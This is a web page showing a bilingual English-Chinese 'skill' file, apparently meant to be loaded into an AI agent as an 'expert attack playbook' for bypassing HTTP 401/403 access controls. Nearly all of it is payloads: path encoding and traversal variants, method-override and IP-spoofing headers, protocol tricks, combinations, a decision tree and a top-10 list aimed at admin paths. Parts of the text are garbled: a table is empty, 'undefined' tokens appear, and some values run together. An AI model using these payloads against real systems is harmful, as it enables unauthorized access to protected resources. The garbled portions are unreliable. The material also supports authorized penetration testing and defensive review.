401-403-bypass-techniques
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseSKILL: 401/403 Bypass Techniques — Expert Attack Playbook
SKILL: 401/403绕过技术——专家攻击操作手册
AI LOAD INSTRUCTION: Comprehensive 401/403 forbidden bypass techniques. Covers path normalization tricks, HTTP method override, header-based bypasses (X-Original-URL, X-Forwarded-For), protocol version tricks, and combination attacks. Base models typically know 2-3 header bypasses but miss the full matrix of path manipulation variants and verb+path combos.
AI加载说明:全面的401/403禁止访问绕过技术,涵盖路径归一化技巧、HTTP方法覆盖、基于请求头的绕过(X-Original-URL、X-Forwarded-For)、协议版本技巧以及组合攻击。基础模型通常只知道2-3种请求头绕过方法,但会遗漏路径操纵变体和请求方法+路径组合的完整矩阵。
0. RELATED ROUTING
0. 相关路由
- authbypass-authentication-flaws — broader auth bypass (login flaws, session handling)
- waf-bypass-techniques — when bypass is WAF-specific rather than access control
- http-host-header-attacks — Host header manipulation for routing bypass
- request-smuggling — smuggle past access controls entirely
- http2-specific-attacks — h2c smuggling to bypass proxy ACLs
- authbypass-authentication-flaws — 更广泛的身份验证绕过(登录漏洞、会话处理)
- waf-bypass-techniques — 针对WAF而非访问控制的绕过场景
- http-host-header-attacks — 通过Host头操纵实现路由绕过
- request-smuggling — 完全绕过访问控制的请求走私技术
- http2-specific-attacks — 绕过代理ACL的h2c走私技术
1. PATH MANIPULATION BYPASSES
1. 路径操纵绕过
The core idea: the reverse proxy/WAF checks one path format, but the backend normalizes differently.
核心思路:反向代理/WAF检查的是一种路径格式,但后端的归一化处理逻辑不同。
1.1 Trailing Slash / Missing Slash
1.1 末尾斜杠/缺失斜杠
/admin → 403
/admin/ → 200 ✓ (trailing slash)
/admin/. → 200 ✓ (trailing dot)/admin → 403
/admin/ → 200 ✓ (末尾加斜杠)
/admin/. → 200 ✓ (末尾加点)1.2 Case Sensitivity
1.2 大小写敏感性
/admin → 403
/Admin → 200 ✓
/ADMIN → 200 ✓
/aDmIn → 200 ✓Works when: proxy rule is case-sensitive but backend is case-insensitive (common on Windows/IIS).
/admin → 403
/Admin → 200 ✓
/ADMIN → 200 ✓
/aDmIn → 200 ✓适用场景:代理规则区分大小写但后端不区分大小写(常见于Windows/IIS环境)。
1.3 URL Encoding
1.3 URL编码
/admin → 403
/%61dmin → 200 ✓ (encode 'a')
/admi%6e → 200 ✓ (encode 'n')
/%61%64%6d%69%6e → 200 ✓ (full encode)/admin → 403
/%61dmin → 200 ✓ (编码'a')
/admi%6e → 200 ✓ (编码'n')
/%61%64%6d%69%6e → 200 ✓ (全编码)1.4 Double URL Encoding
1.4 双重URL编码
/admin → 403
/%2561dmin → 200 ✓ (%25 = %, decoded twice: %61 → a)
/admin%252f → 200 ✓
/admin..%252f → 200 ✓/admin → 403
/%2561dmin → 200 ✓ (%25 = %, 两次解码后: %61 → a)
/admin%252f → 200 ✓
/admin..%252f → 200 ✓1.5 Unicode / UTF-8 Encoding
1.5 Unicode / UTF-8编码
/admin → 403
/admi%C0%AE → 200 ✓ (overlong UTF-8 for '.')
/admi%C0%6E → 200 ✓ (overlong encoding)
/%C0%AFadmin → 200 ✓ (overlong '/')/admin → 403
/admi%C0%AE → 200 ✓ ('.'的超长UTF-8编码)
/admi%C0%6E → 200 ✓ (超长编码)
/%C0%AFadmin → 200 ✓ ('/'的超长编码)1.6 Dot-Segment / Path Traversal
1.6 点段/路径遍历
/admin → 403
/./admin → 200 ✓
//admin → 200 ✓
/admin/./ → 200 ✓
/.//admin → 200 ✓
/admin..;/ → 200 ✓ (Tomcat path parameter)/admin → 403
/./admin → 200 ✓
//admin → 200 ✓
/admin/./ → 200 ✓
/.//admin → 200 ✓
/admin..;/ → 200 ✓ (Tomcat路径参数)1.7 Null Byte
1.7 空字节
/admin → 403
/admin%00 → 200 ✓
/admin%00.json → 200 ✓
/%00/admin → 200 ✓/admin → 403
/admin%00 → 200 ✓
/admin%00.json → 200 ✓
/%00/admin → 200 ✓1.8 Path Parameter Injection
1.8 路径参数注入
/admin → 403
/admin;foo=bar → 200 ✓ (Tomcat/Java treats ; as path param)
/admin; → 200 ✓
/admin;x → 200 ✓/admin → 403
/admin;foo=bar → 200 ✓ (Tomcat/Java将;识别为路径参数分隔符)
/admin; → 200 ✓
/admin;x → 200 ✓1.9 Trailing Special Characters
1.9 末尾特殊字符
/admin%20 (space) /admin%09 (tab) /admin? (empty query)
/admin.json /admin.html /admin/~/admin%20 (空格) /admin%09 (制表符) /admin? (空查询参数)
/admin.json /admin.html /admin/~1.10 Backslash (Windows/IIS)
1.10 反斜杠(Windows/IIS)
/admin\ /admin\..\/ \..\admin/admin\ /admin\..\/ \..\admin1.11 Combined Path Tricks
1.11 组合路径技巧
///admin/// /./admin/./ /admin/..;/admin (Tomcat) /%2e/admin///admin/// /./admin/./ /admin/..;/admin (Tomcat) /%2e/admin2. HTTP METHOD BYPASS
2. HTTP方法绕过
2.1 Direct Method Change
2.1 直接修改方法
GET /admin → 403
POST /admin → 200 ✓
PUT /admin → 200 ✓
PATCH /admin → 200 ✓
DELETE /admin → 200 ✓
OPTIONS /admin → 200 ✓ (may leak allowed methods)
TRACE /admin → 200 ✓ (may reflect headers — XST)
HEAD /admin → 200 ✓ (same as GET but no body — confirms access)GET /admin → 403
POST /admin → 200 ✓
PUT /admin → 200 ✓
PATCH /admin → 200 ✓
DELETE /admin → 200 ✓
OPTIONS /admin → 200 ✓ (可能泄露允许的方法)
TRACE /admin → 200 ✓ (可能反射请求头 — XST漏洞)
HEAD /admin → 200 ✓ (和GET效果一致但无响应体 — 确认访问权限)2.2 Method Override Headers
2.2 方法覆盖请求头
When the proxy blocks by method, but the backend reads override headers:
http
GET /admin HTTP/1.1
X-HTTP-Method-Override: PUT
GET /admin HTTP/1.1
X-Method-Override: POST
GET /admin HTTP/1.1
X-HTTP-Method: DELETE
POST /admin HTTP/1.1
X-HTTP-Method-Override: PATCH
_method=PUT (in POST body — Rails, Laravel)当代理按请求方法拦截,但后端会读取覆盖头时适用:
http
GET /admin HTTP/1.1
X-HTTP-Method-Override: PUT
GET /admin HTTP/1.1
X-Method-Override: POST
GET /admin HTTP/1.1
X-HTTP-Method: DELETE
POST /admin HTTP/1.1
X-HTTP-Method-Override: PATCH
_method=PUT (在POST请求体中 — 适用于Rails、Laravel)2.3 Custom / Invalid Methods
2.3 自定义/无效方法
FOOBAR /admin HTTP/1.1 → some ACLs only check GET/POST
GETS /admin HTTP/1.1 → typo-like methods may bypass
CONNECT /admin HTTP/1.1 → proxy may tunnel
PROPFIND /admin HTTP/1.1 → WebDAV method
MOVE /admin HTTP/1.1 → WebDAV methodFOOBAR /admin HTTP/1.1 → 部分ACL仅检查GET/POST
GETS /admin HTTP/1.1 → 类拼写错误的方法可能绕过
CONNECT /admin HTTP/1.1 → 代理可能建立隧道
PROPFIND /admin HTTP/1.1 → WebDAV方法
MOVE /admin HTTP/1.1 → WebDAV方法3. HEADER-BASED BYPASS
3. 基于请求头的绕过
3.1 URL Rewrite Headers (Nginx/IIS)
3.1 URL重写请求头(Nginx/IIS)
These headers tell the backend the "real" URL, bypassing proxy-level path checks:
http
GET / HTTP/1.1
X-Original-URL: /admin
GET / HTTP/1.1
X-Rewrite-URL: /adminThe proxy sees (allowed), but the backend routes to .
GET //admin这些请求头会告知后端「真实」URL,绕过代理层面的路径检查:
http
GET / HTTP/1.1
X-Original-URL: /admin
GET / HTTP/1.1
X-Rewrite-URL: /admin代理看到的是(允许访问),但后端会路由到。
GET //admin3.2 IP Spoofing Headers (Whitelist Bypass)
3.2 IP欺骗请求头(白名单绕过)
Headers to try (each with values , , , ):
127.0.0.110.0.0.10.0.0.0::1http
X-Forwarded-For | X-Real-IP | X-Originating-IP | X-Remote-IP
X-Remote-Addr | X-Client-IP | True-Client-IP | Cluster-Client-IP
X-ProxyUser-IP | X-Custom-IP-Authorization | Forwarded: for=127.0.0.1IP encoding variants: (octal), (decimal), (hex),
0177.0.0.121307064330x7f000001localhost可尝试的请求头(每个的值都可试、、、):
127.0.0.110.0.0.10.0.0.0::1http
X-Forwarded-For | X-Real-IP | X-Originating-IP | X-Remote-IP
X-Remote-Addr | X-Client-IP | True-Client-IP | Cluster-Client-IP
X-ProxyUser-IP | X-Custom-IP-Authorization | Forwarded: for=127.0.0.1IP编码变体:(八进制)、(十进制)、(十六进制)、
0177.0.0.121307064330x7f000001localhost3.3 Other Header Tricks
3.3 其他请求头技巧
http
Referer: https://target.com/admin # Referrer check bypass
Origin: https://target.com # Origin check bypass
Host: localhost # Host header manipulation
X-Forwarded-Host: localhost # Forwarded host
Content-Type: application/json # Content-type switch
X-Requested-With: XMLHttpRequest # AJAX flaghttp
Referer: https://target.com/admin # 来源页检查绕过
Origin: https://target.com # 源站检查绕过
Host: localhost # Host头操纵
X-Forwarded-Host: localhost # 转发Host
Content-Type: application/json # 内容类型切换
X-Requested-With: XMLHttpRequest # AJAX标识4. PROTOCOL VERSION BYPASS
4. 协议版本绕过
http
undefinedhttp
undefinedHTTP/1.0 (some ACLs only apply to HTTP/1.1)
HTTP/1.0 (部分ACL仅对HTTP/1.1生效)
GET /admin HTTP/1.0
GET /admin HTTP/1.0
HTTP/0.9 (extremely legacy — no headers)
HTTP/0.9 (极其老旧的版本 — 无请求头)
GET /admin
GET /admin
HTTP/2 pseudo-header tricks
HTTP/2伪头技巧
:method: GET
:path: /admin
:authority: target.com
:method: GET
:path: /admin
:authority: target.com
See ../http2-specific-attacks/SKILL.md for H2-specific bypasses
查看../http2-specific-attacks/SKILL.md了解HTTP/2专属绕过方法
---
---5. VERB TAMPERING + PATH COMBINATION
5. 请求方法篡改+路径组合
Combine multiple techniques for higher success rate:
http
POST / HTTP/1.1 # method override + URL rewrite
X-Original-URL: /admin
X-HTTP-Method-Override: GET
GET /%61dmin HTTP/1.1 # IP spoof + path encoding
X-Forwarded-For: 127.0.0.1
GET /Admin HTTP/1.0 # protocol + case + IP spoof
X-Forwarded-For: 127.0.0.1组合多种技术提升成功率:
http
POST / HTTP/1.1 # 方法覆盖 + URL重写
X-Original-URL: /admin
X-HTTP-Method-Override: GET
GET /%61dmin HTTP/1.1 # IP欺骗 + 路径编码
X-Forwarded-For: 127.0.0.1
GET /Admin HTTP/1.0 # 协议 + 大小写 + IP欺骗
X-Forwarded-For: 127.0.0.16. TECHNOLOGY-SPECIFIC BYPASSES
6. 特定技术栈绕过
| Server | Key Tricks |
|---|---|
| Apache | |
| Nginx | |
| IIS/ASP.NET | |
| Tomcat/Java | |
| Spring | |
| 服务端 | 核心技巧 |
|---|---|
| Apache | |
| Nginx | |
| IIS/ASP.NET | |
| Tomcat/Java | |
| Spring | |
7. AUTOMATED TOOLS
7. 自动化工具
| Tool | Purpose | URL |
|---|---|---|
| byp4xx | Comprehensive 403 bypass scanner | github.com/lobuhi/byp4xx |
| 403bypasser | Automated header/path/method bypass | github.com/sting8k/403bypasser |
| dirsearch | Directory brute-force with encoding variants | github.com/maurosoria/dirsearch |
| feroxbuster | Recursive content discovery | github.com/epi052/feroxbuster |
| Burp Intruder | Custom payload lists for manual testing | portswigger.net |
| 工具 | 用途 | 地址 |
|---|---|---|
| byp4xx | 全面的403绕过扫描器 | github.com/lobuhi/byp4xx |
| 403bypasser | 自动化请求头/路径/方法绕过 | github.com/sting8k/403bypasser |
| dirsearch | 支持编码变体的目录爆破工具 | github.com/maurosoria/dirsearch |
| feroxbuster | 递归内容发现工具 | github.com/epi052/feroxbuster |
| Burp Intruder | 支持自定义 payload 列表的手动测试工具 | portswigger.net |
byp4xx usage
byp4xx使用方法
bash
undefinedbash
undefinedBasic usage
基础用法
./byp4xx.sh https://target.com/admin
./byp4xx.sh https://target.com/admin
Output shows all attempted bypasses and their response codes
输出会展示所有尝试的绕过手段及其响应码
200/301/302 responses = potential bypass found
200/301/302响应 = 发现潜在可绕过点
---
---8. DECISION TREE
8. 决策树
Got 401 or 403 on a path?
│
├── Try PATH MANIPULATION first (highest success rate)
│ ├── /path/ (trailing slash)
│ ├── /PATH (case change)
│ ├── /path%20 (trailing space)
│ ├── /./path (dot segment)
│ ├── //path (double slash)
│ ├── /path;x (path parameter — Java/Tomcat)
│ ├── /path..;/ (Tomcat specific)
│ ├── /%2e/path (encoded dot)
│ ├── /path%00 (null byte)
│ ├── /path%23 (encoded hash)
│ └── Result? → 200 = bypass found
│
├── Path tricks failed → Try METHOD BYPASS
│ ├── POST/PUT/PATCH/DELETE/OPTIONS
│ ├── HEAD (same as GET without body)
│ ├── X-HTTP-Method-Override: PUT
│ └── TRACE (may reflect auth headers — XST)
│
├── Method tricks failed → Try HEADER BYPASS
│ ├── X-Original-URL: /path (Nginx/IIS rewrite)
│ ├── X-Rewrite-URL: /path (same concept)
│ ├── X-Forwarded-For: 127.0.0.1 (IP whitelist)
│ ├── X-Real-IP: 127.0.0.1
│ ├── True-Client-IP: 127.0.0.1
│ └── Referer: https://target.com/path
│
├── Header tricks failed → Try PROTOCOL BYPASS
│ ├── HTTP/1.0 instead of 1.1
│ ├── HTTP/2 h2c smuggling (../http2-specific-attacks/)
│ └── WebSocket upgrade
│
├── Single techniques failed → Try COMBINATIONS
│ ├── Method + Path: POST /PATH/
│ ├── Header + Path: X-Forwarded-For + /path%20
│ ├── All three: POST + X-Original-URL + IP headers
│ └── Protocol + Path: HTTP/1.0 + encoded path
│
├── All bypasses failed → Consider ALTERNATIVE APPROACHES
│ ├── Request smuggling (../request-smuggling/) → smuggle past ACL
│ ├── SSRF (../ssrf-server-side-request-forgery/) → access from server
│ ├── IDOR (../idor-broken-object-authorization/) → access data directly
│ └── Auth flaws (../authbypass-authentication-flaws/) → login bypass
│
└── Automated scan with byp4xx / 403bypasser for completeness某路径返回401或403?
│
├── 先尝试路径操纵(成功率最高)
│ ├── /path/ (末尾加斜杠)
│ ├── /PATH (修改大小写)
│ ├── /path%20 (末尾加空格)
│ ├── /./path (点段)
│ ├── //path (双斜杠)
│ ├── /path;x (路径参数 — Java/Tomcat)
│ ├── /path..;/ (Tomcat专属)
│ ├── /%2e/path (编码点)
│ ├── /path%00 (空字节)
│ ├── /path%23 (编码哈希符)
│ └── 结果? → 200 = 找到绕过方法
│
├── 路径技巧失效 → 尝试方法绕过
│ ├── POST/PUT/PATCH/DELETE/OPTIONS
│ ├── HEAD (和GET效果一致但无响应体)
│ ├── X-HTTP-Method-Override: PUT
│ └── TRACE (可能反射身份验证头 — XST漏洞)
│
├── 方法技巧失效 → 尝试请求头绕过
│ ├── X-Original-URL: /path (Nginx/IIS重写)
│ ├── X-Rewrite-URL: /path (同理)
│ ├── X-Forwarded-For: 127.0.0.1 (IP白名单)
│ ├── X-Real-IP: 127.0.0.1
│ ├── True-Client-IP: 127.0.0.1
│ └── Referer: https://target.com/path
│
├── 请求头技巧失效 → 尝试协议绕过
│ ├── 用HTTP/1.0替代1.1
│ ├── HTTP/2 h2c走私 (../http2-specific-attacks/)
│ └── WebSocket升级
│
├── 单一技术失效 → 尝试组合技术
│ ├── 方法 + 路径: POST /PATH/
│ ├── 请求头 + 路径: X-Forwarded-For + /path%20
│ ├── 三者组合: POST + X-Original-URL + IP头
│ └── 协议 + 路径: HTTP/1.0 + 编码路径
│
├── 所有绕过方法失效 → 考虑替代方案
│ ├── 请求走私 (../request-smuggling/) → 绕过ACL
│ ├── SSRF (../ssrf-server-side-request-forgery/) → 从服务端内部访问
│ ├── IDOR (../idor-broken-object-authorization/) → 直接访问数据
│ └── 身份验证漏洞 (../authbypass-authentication-flaws/) → 登录绕过
│
└── 用byp4xx/403bypasser做自动化扫描确保覆盖全面9. QUICK REFERENCE — KEY PAYLOADS
9. 快速参考 — 核心Payload
http
undefinedhttp
undefinedTop 10 quick-wins (try these first)
top10快速见效Payload(优先尝试)
GET /admin/ HTTP/1.1 # trailing slash
GET /Admin HTTP/1.1 # case change
GET /admin%20 HTTP/1.1 # trailing space
GET /./admin HTTP/1.1 # dot segment
GET //admin HTTP/1.1 # double slash
POST /admin HTTP/1.1 # method change
GET / HTTP/1.1 # X-Original-URL bypass
X-Original-URL: /admin
GET /admin HTTP/1.1 # IP whitelist bypass
X-Forwarded-For: 127.0.0.1
GET /admin;.css HTTP/1.1 # IIS path param
GET /admin..;/ HTTP/1.1 # Tomcat bypass
undefinedGET /admin/ HTTP/1.1 # 末尾斜杠
GET /Admin HTTP/1.1 # 大小写修改
GET /admin%20 HTTP/1.1 # 末尾空格
GET /./admin HTTP/1.1 # 点段
GET //admin HTTP/1.1 # 双斜杠
POST /admin HTTP/1.1 # 修改请求方法
GET / HTTP/1.1 # X-Original-URL绕过
X-Original-URL: /admin
GET /admin HTTP/1.1 # IP白名单绕过
X-Forwarded-For: 127.0.0.1
GET /admin;.css HTTP/1.1 # IIS路径参数
GET /admin..;/ HTTP/1.1 # Tomcat绕过
undefined